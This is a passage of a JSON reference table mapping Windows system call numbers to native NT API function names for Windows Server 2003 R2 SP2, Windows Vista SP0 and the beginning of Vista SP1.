"NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateUserPhysicalPages", "109": "NtAllocateUuids", "110": "NtAreMappedFilesTheSame", "111": "NtAssignProcessToJobObject", "112": "NtCancelDeviceWakeupRequest", "113": "NtCompactKeys", "114": "NtCompareTokens", "115": "NtCompleteConnectPort", "116": "NtCompressKey", "117": "NtConnectPort", "118": "NtCreateDebugObject", "119": "NtCreateDirectoryObject", "120": "NtCreateEventPair", "121": "NtCreateIoCompletion", "122": "NtCreateJobObject", "123": "NtCreateJobSet", "124": "NtCreateKeyedEvent", "125": "NtCreateMailslotFile", "126": "NtCreateMutant", "127": "NtCreateNamedPipeFile", "128": "NtCreatePagingFile", "129": "NtCreatePort", "130": "NtCreateProcess", "131": "NtCreateProfile", "132": "NtCreateSemaphore", "133": "NtCreateSymbolicLinkObject", "134": "NtCreateTimer", "135": "NtCreateToken", "136": "NtCreateWaitablePort", "137": "NtDebugActiveProcess", "138": "NtDebugContinue", "139": "NtDeleteAtom", "140": "NtDeleteBootEntry", "141": "NtDeleteDriverEntry", "142": "NtDeleteFile", "143": "NtDeleteKey", "144": "NtDeleteObjectAuditAlarm", "145": "NtDeleteValueKey", "146": "NtDisplayString", "147": "NtEnumerateBootEntries", "148": "NtEnumerateDriverEntries", "149": "NtEnumerateSystemEnvironmentValuesEx", "150": "NtExtendSection", "151": "NtFilterToken", "152": "NtFlushInstructionCache", "153": "NtFlushKey", "154": "NtFlushVirtualMemory", "155": "NtFlushWriteBuffer", "156": "NtFreeUserPhysicalPages", "157": "NtGetContextThread", "158": "NtGetCurrentProcessorNumber", "159": "NtGetDevicePowerState", "160": "NtGetPlugPlayEvent", "161": "NtGetWriteWatch", "162": "NtImpersonateAnonymousToken", "163": "NtImpersonateThread", "164": "NtInitializeRegistry", "165": "NtInitiatePowerAction", "166": "NtIsSystemResumeAutomatic", "167": "NtListenPort", "168": "NtLoadDriver", "169": "NtLoadKey", "170": "NtLoadKey2", "171": "NtLoadKeyEx", "172": "NtLockFile", "173": "NtLockProductActivationKeys", "174": "NtLockRegistryKey", "175": "NtLockVirtualMemory", "176": "NtMakePermanentObject", "177": "NtMakeTemporaryObject", "178": "NtMapUserPhysicalPages", "179": "NtModifyBootEntry", "180": "NtModifyDriverEntry", "181": "NtNotifyChangeDirectoryFile", "182": "NtNotifyChangeKey", "183": "NtNotifyChangeMultipleKeys", "184": "NtOpenEventPair", "185": "NtOpenIoCompletion", "186": "NtOpenJobObject", "187": "NtOpenKeyedEvent", "188": "NtOpenMutant", "189": "NtOpenObjectAuditAlarm", "190": "NtOpenProcessToken", "191": "NtOpenSemaphore", "192": "NtOpenSymbolicLinkObject", "193": "NtOpenThread", "194": "NtOpenTimer", "195": "NtPlugPlayControl", "196": "NtPrivilegeCheck", "197": "NtPrivilegeObjectAuditAlarm", "198": "NtPrivilegedServiceAuditAlarm", "199": "NtPulseEvent", "200": "NtQueryBootEntryOrder", "201": "NtQueryBootOptions", "202": "NtQueryDebugFilterState", "203": "NtQueryDirectoryObject", "204": "NtQueryDriverEntryOrder", "205": "NtQueryEaFile", "206": "NtQueryFullAttributesFile", "207": "NtQueryInformationAtom", "208": "NtQueryInformationJobObject", "209": "NtQueryInformationPort", "210": "NtQueryInstallUILanguage", "211": "NtQueryIntervalProfile", "212": "NtQueryIoCompletion", "213": "NtQueryMultipleValueKey", "214": "NtQueryMutant", "215": "NtQueryOpenSubKeys", "216": "NtQueryOpenSubKeysEx", "217": "NtQueryPortInformationProcess", "218": "NtQueryQuotaInformationFile", "219": "NtQuerySecurityObject", "220": "NtQuerySemaphore", "221": "NtQuerySymbolicLinkObject", "222": "NtQuerySystemEnvironmentValue", "223": "NtQuerySystemEnvironmentValueEx", "224": "NtQueryTimerResolution", "225": "NtRaiseException", "226": "NtRaiseHardError", "227": "NtRegisterThreadTerminatePort", "228": "NtReleaseKeyedEvent", "229": "NtRemoveProcessDebug", "230": "NtRenameKey", "231": "NtReplaceKey", "232": "NtReplyWaitReplyPort", "233": "NtRequestDeviceWakeup", "234": "NtRequestPort", "235": "NtRequestWakeupLatency", "236": "NtResetEvent", "237": "NtResetWriteWatch", "238": "NtRestoreKey", "239": "NtResumeProcess", "240": "NtSaveKey", "241": "NtSaveKeyEx", "242": "NtSaveMergedKeys", "243": "NtSecureConnectPort", "244": "NtSetBootEntryOrder", "245": "NtSetBootOptions", "246": "NtSetContextThread", "247": "NtSetDebugFilterState", "248": "NtSetDefaultHardErrorPort", "249": "NtSetDefaultLocale", "250": "NtSetDefaultUILanguage", "251": "NtSetDriverEntryOrder", "252": "NtSetEaFile", "253": "NtSetHighEventPair", "254": "NtSetHighWaitLowEventPair", "255": "NtSetInformationDebugObject", "256": "NtSetInformationJobObject", "257": "NtSetInformationKey", "258": "NtSetInformationToken", "259": "NtSetIntervalProfile", "260": "NtSetIoCompletion", "261": "NtSetLdtEntries", "262": "NtSetLowEventPair", "263": "NtSetLowWaitHighEventPair", "264": "NtSetQuotaInformationFile", "265": "NtSetSecurityObject", "266": "NtSetSystemEnvironmentValue", "267": "NtSetSystemEnvironmentValueEx", "268": "NtSetSystemInformation", "269": "NtSetSystemPowerState", "270": "NtSetSystemTime", "271": "NtSetThreadExecutionState", "272": "NtSetTimerResolution", "273": "NtSetUuidSeed", "274": "NtSetVolumeInformationFile", "275": "NtShutdownSystem", "276": "NtSignalAndWaitForSingleObject", "277": "NtStartProfile", "278": "NtStopProfile", "279": "NtSuspendProcess", "280": "NtSuspendThread", "281": "NtSystemDebugControl", "282": "NtTerminateJobObject", "283": "NtTestAlert", "284": "NtTranslateFilePath", "285": "NtUnloadDriver", "286": "NtUnloadKey", "287": "NtUnloadKey2", "288": "NtUnloadKeyEx", "289": "NtUnlockFile", "290": "NtUnlockVirtualMemory", "291": "NtVdmControl", "292": "NtWaitForDebugEvent", "293": "NtWaitForKeyedEvent", "294": "NtWaitHighEventPair", "295": "NtWaitLowEventPair"}, "R2 SP2": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateUserPhysicalPages", "109": "NtAllocateUuids", "110": "NtAreMappedFilesTheSame", "111": "NtAssignProcessToJobObject", "112": "NtCancelDeviceWakeupRequest", "113": "NtCompactKeys", "114": "NtCompareTokens", "115": "NtCompleteConnectPort", "116": "NtCompressKey", "117": "NtConnectPort", "118": "NtCreateDebugObject", "119": "NtCreateDirectoryObject", "120": "NtCreateEventPair", "121": "NtCreateIoCompletion", "122": "NtCreateJobObject", "123": "NtCreateJobSet", "124": "NtCreateKeyedEvent", "125": "NtCreateMailslotFile", "126": "NtCreateMutant", "127": "NtCreateNamedPipeFile", "128": "NtCreatePagingFile", "129": "NtCreatePort", "130": "NtCreateProcess", "131": "NtCreateProfile", "132": "NtCreateSemaphore", "133": "NtCreateSymbolicLinkObject", "134": "NtCreateTimer", "135": "NtCreateToken", "136": "NtCreateWaitablePort", "137": "NtDebugActiveProcess", "138": "NtDebugContinue", "139": "NtDeleteAtom", "140": "NtDeleteBootEntry", "141": "NtDeleteDriverEntry", "142": "NtDeleteFile", "143": "NtDeleteKey", "144": "NtDeleteObjectAuditAlarm", "145": "NtDeleteValueKey", "146": "NtDisplayString", "147": "NtEnumerateBootEntries", "148": "NtEnumerateDriverEntries", "149": "NtEnumerateSystemEnvironmentValuesEx", "150": "NtExtendSection", "151": "NtFilterToken", "152": "NtFlushInstructionCache", "153": "NtFlushKey", "154": "NtFlushVirtualMemory", "155": "NtFlushWriteBuffer", "156": "NtFreeUserPhysicalPages", "157": "NtGetContextThread", "158": "NtGetCurrentProcessorNumber", "159": "NtGetDevicePowerState", "160": "NtGetPlugPlayEvent", "161": "NtGetWriteWatch", "162": "NtImpersonateAnonymousToken", "163": "NtImpersonateThread", "164": "NtInitializeRegistry", "165": "NtInitiatePowerAction", "166": "NtIsSystemResumeAutomatic", "167": "NtListenPort", "168": "NtLoadDriver", "169": "NtLoadKey", "170": "NtLoadKey2", "171": "NtLoadKeyEx", "172": "NtLockFile", "173": "NtLockProductActivationKeys", "174": "NtLockRegistryKey", "175": "NtLockVirtualMemory", "176": "NtMakePermanentObject", "177": "NtMakeTemporaryObject", "178": "NtMapUserPhysicalPages", "179": "NtModifyBootEntry", "180": "NtModifyDriverEntry", "181": "NtNotifyChangeDirectoryFile", "182": "NtNotifyChangeKey", "183": "NtNotifyChangeMultipleKeys", "184": "NtOpenEventPair", "185": "NtOpenIoCompletion", "186": "NtOpenJobObject", "187": "NtOpenKeyedEvent", "188": "NtOpenMutant", "189": "NtOpenObjectAuditAlarm", "190": "NtOpenProcessToken", "191": "NtOpenSemaphore", "192": "NtOpenSymbolicLinkObject", "193": "NtOpenThread", "194": "NtOpenTimer", "195": "NtPlugPlayControl", "196": "NtPrivilegeCheck", "197": "NtPrivilegeObjectAuditAlarm", "198": "NtPrivilegedServiceAuditAlarm", "199": "NtPulseEvent", "200": "NtQueryBootEntryOrder", "201": "NtQueryBootOptions", "202": "NtQueryDebugFilterState", "203": "NtQueryDirectoryObject", "204": "NtQueryDriverEntryOrder", "205": "NtQueryEaFile", "206": "NtQueryFullAttributesFile", "207": "NtQueryInformationAtom", "208": "NtQueryInformationJobObject", "209": "NtQueryInformationPort", "210": "NtQueryInstallUILanguage", "211": "NtQueryIntervalProfile", "212": "NtQueryIoCompletion", "213": "NtQueryMultipleValueKey", "214": "NtQueryMutant", "215": "NtQueryOpenSubKeys", "216": "NtQueryOpenSubKeysEx", "217": "NtQueryPortInformationProcess", "218": "NtQueryQuotaInformationFile", "219": "NtQuerySecurityObject", "220": "NtQuerySemaphore", "221": "NtQuerySymbolicLinkObject", "222": "NtQuerySystemEnvironmentValue", "223": "NtQuerySystemEnvironmentValueEx", "224": "NtQueryTimerResolution", "225": "NtRaiseException", "226": "NtRaiseHardError", "227": "NtRegisterThreadTerminatePort", "228": "NtReleaseKeyedEvent", "229": "NtRemoveProcessDebug", "230": "NtRenameKey", "231": "NtReplaceKey", "232": "NtReplyWaitReplyPort", "233": "NtRequestDeviceWakeup", "234": "NtRequestPort", "235": "NtRequestWakeupLatency", "236": "NtResetEvent", "237": "NtResetWriteWatch", "238": "NtRestoreKey", "239": "NtResumeProcess", "240": "NtSaveKey", "241": "NtSaveKeyEx", "242": "NtSaveMergedKeys", "243": "NtSecureConnectPort", "244": "NtSetBootEntryOrder", "245": "NtSetBootOptions", "246": "NtSetContextThread", "247": "NtSetDebugFilterState", "248": "NtSetDefaultHardErrorPort", "249": "NtSetDefaultLocale", "250": "NtSetDefaultUILanguage", "251": "NtSetDriverEntryOrder", "252": "NtSetEaFile", "253": "NtSetHighEventPair", "254": "NtSetHighWaitLowEventPair", "255": "NtSetInformationDebugObject", "256": "NtSetInformationJobObject", "257": "NtSetInformationKey", "258": "NtSetInformationToken", "259": "NtSetIntervalProfile", "260": "NtSetIoCompletion", "261": "NtSetLdtEntries", "262": "NtSetLowEventPair", "263": "NtSetLowWaitHighEventPair", "264": "NtSetQuotaInformationFile", "265": "NtSetSecurityObject", "266": "NtSetSystemEnvironmentValue", "267": "NtSetSystemEnvironmentValueEx", "268": "NtSetSystemInformation", "269": "NtSetSystemPowerState", "270": "NtSetSystemTime", "271": "NtSetThreadExecutionState", "272": "NtSetTimerResolution", "273": "NtSetUuidSeed", "274": "NtSetVolumeInformationFile", "275": "NtShutdownSystem", "276": "NtSignalAndWaitForSingleObject", "277": "NtStartProfile", "278": "NtStopProfile", "279": "NtSuspendProcess", "280": "NtSuspendThread", "281": "NtSystemDebugControl", "282": "NtTerminateJobObject", "283": "NtTestAlert", "284": "NtTranslateFilePath", "285": "NtUnloadDriver", "286": "NtUnloadKey", "287": "NtUnloadKey2", "288": "NtUnloadKeyEx", "289": "NtUnlockFile", "290": "NtUnlockVirtualMemory", "291": "NtVdmControl", "292": "NtWaitForDebugEvent", "293": "NtWaitForKeyedEvent", "294": "NtWaitHighEventPair", "295": "NtWaitLowEventPair"}}, "Windows Vista": {"SP0": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAcquireCMFViewOwnership", "103": "NtAddBootEntry", "104": "NtAddDriverEntry", "105": "NtAdjustGroupsToken", "106": "NtAlertResumeThread", "107": "NtAlertThread", "108": "NtAllocateLocallyUniqueId", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": "NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtCancelDeviceWakeupRequest", "135": "NtCancelIoFileEx", "136": "NtCancelSynchronousIoFile", "137": "NtClearAllSavepointsTransaction", "138": "NtClearSavepointTransaction", "139": "NtCommitComplete", "140": "NtCommitEnlistment", "141": "NtCommitTransaction", "142": "NtCompactKeys", "143": "NtCompareTokens", "144": "NtCompleteConnectPort", "145": "NtCompressKey", "146": "NtConnectPort", "147": "NtCreateDebugObject", "148": "NtCreateDirectoryObject", "149": "NtCreateEnlistment", "150": "NtCreateEventPair", "151": "NtCreateIoCompletion", "152": "NtCreateJobObject", "153": "NtCreateJobSet", "154": "NtCreateKeyTransacted", "155": "NtCreateKeyedEvent", "156": "NtCreateMailslotFile", "157": "NtCreateMutant", "158": "NtCreateNamedPipeFile", "159": "NtCreatePagingFile", "160": "NtCreatePort", "161": "NtCreatePrivateNamespace", "162": "NtCreateProcess", "163": "NtCreateProfile", "164": "NtCreateResourceManager", "165": "NtCreateSemaphore", "166": "NtCreateSymbolicLinkObject", "167": "NtCreateThreadEx", "168": "NtCreateTimer", "169": "NtCreateToken", "170": "NtCreateTransaction", "171": "NtCreateTransactionManager", "172": "NtCreateUserProcess", "173": "NtCreateWaitablePort", "174": "NtCreateWorkerFactory", "175": "NtDebugActiveProcess", "176": "NtDebugContinue", "177": "NtDeleteAtom", "178": "NtDeleteBootEntry", "179": "NtDeleteDriverEntry", "180": "NtDeleteFile", "181": "NtDeleteKey", "182": "NtDeleteObjectAuditAlarm", "183": "NtDeletePrivateNamespace", "184": "NtDeleteValueKey", "185": "NtDisplayString", "186": "NtEnumerateBootEntries", "187": "NtEnumerateDriverEntries", "188": "NtEnumerateSystemEnvironmentValuesEx", "189": "NtEnumerateTransactionObject", "190": "NtExtendSection", "191": "NtFilterToken", "192": "NtFlushInstallUILanguage", "193": "NtFlushInstructionCache", "194": "NtFlushKey", "195": "NtFlushProcessWriteBuffers", "196": "NtFlushVirtualMemory", "197": "NtFlushWriteBuffer", "198": "NtFreeUserPhysicalPages", "199": "NtFreezeRegistry", "200": "NtFreezeTransactions", "201": "NtGetContextThread", "202": "NtGetCurrentProcessorNumber", "203": "NtGetDevicePowerState", "204": "NtGetMUIRegistryInfo", "205": "NtGetNextProcess", "206": "NtGetNextThread", "207": "NtGetNlsSectionPtr", "208": "NtGetNotificationResourceManager", "209": "NtGetPlugPlayEvent", "210": "NtGetWriteWatch", "211": "NtImpersonateAnonymousToken", "212": "NtImpersonateThread", "213": "NtInitializeNlsFiles", "214": "NtInitializeRegistry", "215": "NtInitiatePowerAction", "216": "NtIsSystemResumeAutomatic", "217": "NtIsUILanguageComitted", "218": "NtListTransactions", "219": "NtListenPort", "220": "NtLoadDriver", "221": "NtLoadKey", "222": "NtLoadKey2", "223": "NtLoadKeyEx", "224": "NtLockFile", "225": "NtLockProductActivationKeys", "226": "NtLockRegistryKey", "227": "NtLockVirtualMemory", "228": "NtMakePermanentObject", "229": "NtMakeTemporaryObject", "230": "NtMapCMFModule", "231": "NtMapUserPhysicalPages", "232": "NtMarshallTransaction", "233": "NtModifyBootEntry", "234": "NtModifyDriverEntry", "235": "NtNotifyChangeDirectoryFile", "236": "NtNotifyChangeKey", "237": "NtNotifyChangeMultipleKeys", "238": "NtOpenEnlistment", "239": "NtOpenEventPair", "240": "NtOpenIoCompletion", "241": "NtOpenJobObject", "242": "NtOpenKeyTransacted", "243": "NtOpenKeyedEvent", "244": "NtOpenMutant", "245": "NtOpenObjectAuditAlarm", "246": "NtOpenPrivateNamespace", "247": "NtOpenProcessToken", "248": "NtOpenResourceManager", "249": "NtOpenSemaphore", "250": "NtOpenSession", "251": "NtOpenSymbolicLinkObject", "252": "NtOpenThread", "253": "NtOpenTimer", "254": "NtOpenTransaction", "255": "NtOpenTransactionManager", "256": "NtPlugPlayControl", "257": "NtPrePrepareComplete", "258": "NtPrePrepareEnlistment", "259": "NtPrepareComplete", "260": "NtPrepareEnlistment", "261": "NtPrivilegeCheck", "262": "NtPrivilegeObjectAuditAlarm", "263": "NtPrivilegedServiceAuditAlarm", "264": "NtPropagationComplete", "265": "NtPropagationFailed", "266": "NtPullTransaction", "267": "NtPulseEvent", "268": "NtQueryBootEntryOrder", "269": "NtQueryBootOptions", "270": "NtQueryDebugFilterState", "271": "NtQueryDirectoryObject", "272": "NtQueryDriverEntryOrder", "273": "NtQueryEaFile", "274": "NtQueryFullAttributesFile", "275": "NtQueryInformationAtom", "276": "NtQueryInformationEnlistment", "277": "NtQueryInformationJobObject", "278": "NtQueryInformationPort", "279": "NtQueryInformationResourceManager", "280": "NtQueryInformationTransaction", "281": "NtQueryInformationTransactionManager", "282": "NtQueryInformationWorkerFactory", "283": "NtQueryInstallUILanguage", "284": "NtQueryIntervalProfile", "285": "NtQueryIoCompletion", "286": "NtQueryLicenseValue", "287": "NtQueryMultipleValueKey", "288": "NtQueryMutant", "289": "NtQueryOpenSubKeys", "290": "NtQueryOpenSubKeysEx", "291": "NtQueryPortInformationProcess", "292": "NtQueryQuotaInformationFile", "293": "NtQuerySecurityObject", "294": "NtQuerySemaphore", "295": "NtQuerySymbolicLinkObject", "296": "NtQuerySystemEnvironmentValue", "297": "NtQuerySystemEnvironmentValueEx", "298": "NtQueryTimerResolution", "299": "NtRaiseException", "300": "NtRaiseHardError", "301": "NtReadOnlyEnlistment", "302": "NtRecoverEnlistment", "303": "NtRecoverResourceManager", "304": "NtRecoverTransactionManager", "305": "NtRegisterProtocolAddressInformation", "306": "NtRegisterThreadTerminatePort", "307": "NtReleaseCMFViewOwnership", "308": "NtReleaseKeyedEvent", "309": "NtReleaseWorkerFactoryWorker", "310": "NtRemoveIoCompletionEx", "311": "NtRemoveProcessDebug", "312": "NtRenameKey", "313": "NtReplaceKey", "314": "NtReplyWaitReplyPort", "315": "NtRequestDeviceWakeup", "316": "NtRequestPort", "317": "NtRequestWakeupLatency", "318": "NtResetEvent", "319": "NtResetWriteWatch", "320": "NtRestoreKey", "321": "NtResumeProcess", "322": "NtRollbackComplete", "323": "NtRollbackEnlistment", "324": "NtRollbackSavepointTransaction", "325": "NtRollbackTransaction", "326": "NtRollforwardTransactionManager", "327": "NtSaveKey", "328": "NtSaveKeyEx", "329": "NtSaveMergedKeys", "330": "NtSavepointComplete", "331": "NtSavepointTransaction", "332": "NtSecureConnectPort", "333": "NtSetBootEntryOrder", "334": "NtSetBootOptions", "335": "NtSetContextThread", "336": "NtSetDebugFilterState", "337": "NtSetDefaultHardErrorPort", "338": "NtSetDefaultLocale", "339": "NtSetDefaultUILanguage", "340": "NtSetDriverEntryOrder", "341": "NtSetEaFile", "342": "NtSetHighEventPair", "343": "NtSetHighWaitLowEventPair", "344": "NtSetInformationDebugObject", "345": "NtSetInformationEnlistment", "346": "NtSetInformationJobObject", "347": "NtSetInformationKey", "348": "NtSetInformationResourceManager", "349": "NtSetInformationToken", "350": "NtSetInformationTransaction", "351": "NtSetInformationTransactionManager", "352": "NtSetInformationWorkerFactory", "353": "NtSetIntervalProfile", "354": "NtSetIoCompletion", "355": "NtSetLdtEntries", "356": "NtSetLowEventPair", "357": "NtSetLowWaitHighEventPair", "358": "NtSetQuotaInformationFile", "359": "NtSetSecurityObject", "360": "NtSetSystemEnvironmentValue", "361": "NtSetSystemEnvironmentValueEx", "362": "NtSetSystemInformation", "363": "NtSetSystemPowerState", "364": "NtSetSystemTime", "365": "NtSetThreadExecutionState", "366": "NtSetTimerResolution", "367": "NtSetUuidSeed", "368": "NtSetVolumeInformationFile", "369": "NtShutdownSystem", "370": "NtShutdownWorkerFactory", "371": "NtSignalAndWaitForSingleObject", "372": "NtSinglePhaseReject", "373": "NtStartProfile", "374": "NtStartTm", "375": "NtStopProfile", "376": "NtSuspendProcess", "377": "NtSuspendThread", "378": "NtSystemDebugControl", "379": "NtTerminateJobObject", "380": "NtTestAlert", "381": "NtThawRegistry", "382": "NtThawTransactions", "383": "NtTraceControl", "384": "NtTranslateFilePath", "385": "NtUnloadDriver", "386": "NtUnloadKey", "387": "NtUnloadKey2", "388": "NtUnloadKeyEx", "389": "NtUnlockFile", "390": "NtUnlockVirtualMemory", "391": "NtVdmControl", "392": "NtWaitForDebugEvent", "393": "NtWaitForKeyedEvent", "394": "NtWaitForWorkViaWorkerFactory", "395": "NtWaitHighEventPair", "396": "NtWaitLowEventPair", "397": "NtWorkerFactoryWorkerReady"}, "SP1": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", 